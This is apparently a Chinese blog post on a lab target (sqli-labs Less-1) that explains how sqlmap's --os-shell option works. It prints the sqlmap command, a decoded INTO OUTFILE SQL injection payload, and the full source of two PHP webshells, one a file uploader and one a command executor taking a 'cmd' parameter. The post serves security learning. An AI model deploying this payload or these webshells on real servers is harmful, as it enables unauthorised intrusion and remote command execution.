sqlmap --os-shell选项原理解析

最新推荐文章于 2024-06-17 13:37:15 发布
最新推荐文章于 2024-06-17 13:37:15 发布
阅读量1.9k 收藏 10
点赞数 9
文章标签: 网络安全 系统安全 sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58783105/article/details/133899577
版权

文章目录

sqlmap --os-shell选项原理解析

以sqli第一关为例。

--os-shell 是 SQLMap 工具的一个参数,用于在成功注入数据库后,执行操作系统命令并获取其输出。

sqlmap -u "http://192.168.188.199/sqli-labs/Less-1/?id=1" --os-shell

image-20230930180012165

选择4,因为整个网站是php代码写的。

image-20230930180138600

选择2,自定义位置。这里选择网站的WWW目录下

image-20230930180253552

获取shell,执行命令即可。

image-20230930180315345

原理解析

在执行sqlmap命令的时候,将代理设置为本地的8080端口,目的是在bp中抓取sqlmap发送的数据包进行分析。

sqlmap -u "http://192.168.188.199/sqli-labs/Less-1/?id=1" --os-shell --proxy=http://127.0.0.1:8080

在抓到第一个数据包后关闭拦截,后续sqlmap发送的数据包都会在bp的历史记录里都有数据。

执行完整个–os-shell过程,在bp的HTTP history历史记录中也抓到了全部数据包,下面对数据包进行分析。

image-20230930182958209

在id后面所跟的参数是经过URL编码的,所有uTools中的工具进行解密。

image-20230930183134944

解码后的语句

-9725' OR 4844=4844 LIMIT 0,1 INTO OUTFILE 'C:/phpstudy_2016/WWW/tmpuxxig.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d433a5c5c70687073747564795f323031365c5c5757575c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- -

但是发现在LINES TERMINATED BY后面还有一段十六进制数,继续解码获取真实的数据。

image-20230930183303214

发现是一段php代码,代码整理如下:

<?php
if (isset($_REQUEST["upload"])){
    $dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){
        $file=$HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }else{
        $file=$_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    @chmod($dir."/".$file,0755);
    echo "File uploaded";
}else {
    echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=C:\\phpstudy_2016\\WWW\\> <input type=submit name=upload value=upload></form>";
}
?>

根据上面的mysql语句,是利用into outfile …LINES TERMINATED BY语句写个用于上传文件的tmpuxxig.php

–os-shell的本质就是写入两个php文件,其中的tmpuxxig.php可以让我们上传文件到网站路径下,如下图。

image-20230930195811136

然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbeabi.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。

image-20230930200304211

继续查看HTTP history历史记录数据包

image-20230930194714426

发现这个数据包是通过POST方法上传了一个tmpbeabi.php

image-20230930201633174

文件的内容经过整理后如下:

<?php 
    $c=$_REQUEST["cmd"];
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set("max_execution_time",0);
    $z=@ini_get("disable_functions");
    if(!empty($z)) {
        $z=preg_replace("/[, ]+/",',',$z);
        $z=explode(',',$z);
        $z=array_map("trim",$z);
    } else {
        $z=array();
    }
    $c=$c." 2>&1\n";
    function f($n) {
        global $z;
        return is_callable($n)and!in_array($n,$z);
    }
    if(f("system")) {
        ob_start();
        system($c);
        $w=ob_get_clean();
    } elseif(f("proc_open")) {
        $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
        $w=NULL;
        while(!feof($t[1])) {
            $w.=fread($t[1],512);
        }
        @proc_close($y);
    } elseif(f("shell_exec")) {
        $w=shell_exec($c);
    } elseif(f("passthru")) {
        ob_start();
        passthru($c);
        $w=ob_get_clean();
    } elseif(f("popen")) {
        $x=popen($c,r);
        $w=NULL;
        if(is_resource($x)) {
            while(!feof($x)) {
                $w.=fread($x,512);
            }
        }
        @pclose($x);
    } elseif(f("exec")) {
        $w=array();
        exec($c,$w);
        $w=join(chr(10),$w).chr(10);
    } else {
        $w=0;
    }
    echo"<pre>$w</pre>";
?>

这是一个用于命令执行的代码,命令执行后会将执行的结果输出。

image-20230930200304211

最后可以在C:\phpstudy_2016\WWW目录下找到生成的两个后门文件。

image-20230930200111143

总结

sqlmap的–os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。

sqlmap --os-shell 的使用需要以下条件:

  1. 知道网站的物理路径。

  2. 网站路径具有写入的权限。

来日可期x
关注
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1063
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap (--os-shell)的使用
weixin_45815516的博客
01-01 459
以pikachu靶场字符型sql注入为例演示sqlmap中的--os-shell的用法
sql注入之sqlmap(渡栗的学习笔记)
最新发布
2301_79998006的博客
06-17 1129
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell
2301_77033340的博客
04-12 938
厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
sqlmap之--os-shell
qq_45927819的博客
03-26 1万+
1、–os-shell原理 使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。 –os-shell的执行条件: dbms为mysql,网站必须是root权限 攻击者需要知道网站的绝对路径 magic_quotes_gpc = off,php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master
sqlmap的--os-shell
m0_71300782的博客
09-06 731
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
sqlmap os shell解析
weixin_34381666的博客
05-18 772
0x00 Background 最近遇到测试环境,最后利用sqlmap的--os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令。 0x01 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 ...
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 644
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
sqlmap学习笔记
Zasen_的博客
06-05 527
ps:学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3.基于报错注入,即页面会返回错误信息,或者把注入的...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3090
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
Sqlmap使用教程
ygyydwx的博客
03-09 2139
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
sqlmap --os-shell 原理详解
热门推荐
..
04-13 2万+
os-shell 执行原理 对于mysql数据库来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下,如下图。 然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。 这是单看tmpbylqf.php的执行效果: 过程演示 本次实验环境是本机上搭建的sqli-libs,目的为了研究--os-shell原理,..
sqlmap —— os-shell参数分析
未完成的歌~的博客
10-07 3671
文章目录前言:一、os-shell执行原理二、测试环境:三、过程演示1、测试权限2、攻击3、选择语言4、输入绝对路径5、建立 os-shell 并执行命令四、原理分析总结: 前言: 最近在看sqlmap,发现--os-shell这个命令很厉害,所以来研究一下。 一、os-shell执行原理 对于 Mysql 数据库来说,--os-shell的本质就是写入两个 php 文件,其中的一个可以让我们用来执行命令,而另外一个可以让我们可以上传文件。 说到写入文件,就要说一下上传文件的两个前提条件,首先我们要知道网站
sqlmapos-shell原理
mingyqf的博客
11-06 4674
0x00 Background 最近遇到测试环境,最后利用sqlmap的--os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令。 0x01 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 工具:sqlmap 靶机: 系统:windows7 环境:wamp搭建的ap...
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 4202
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell网络安全面试题初级
2401_84103512的博客
04-04 866
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sqlmap --os-shell上传shell
04-12
b的意思是运行命令的前缀,sqlmap是一款自动化SQL注入工具。--os-shell表示运行命令并打开操作系统的shell。上述命令的含义是在SQL注入后上传一个shell并打开操作系统的shell,以便执行系统命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值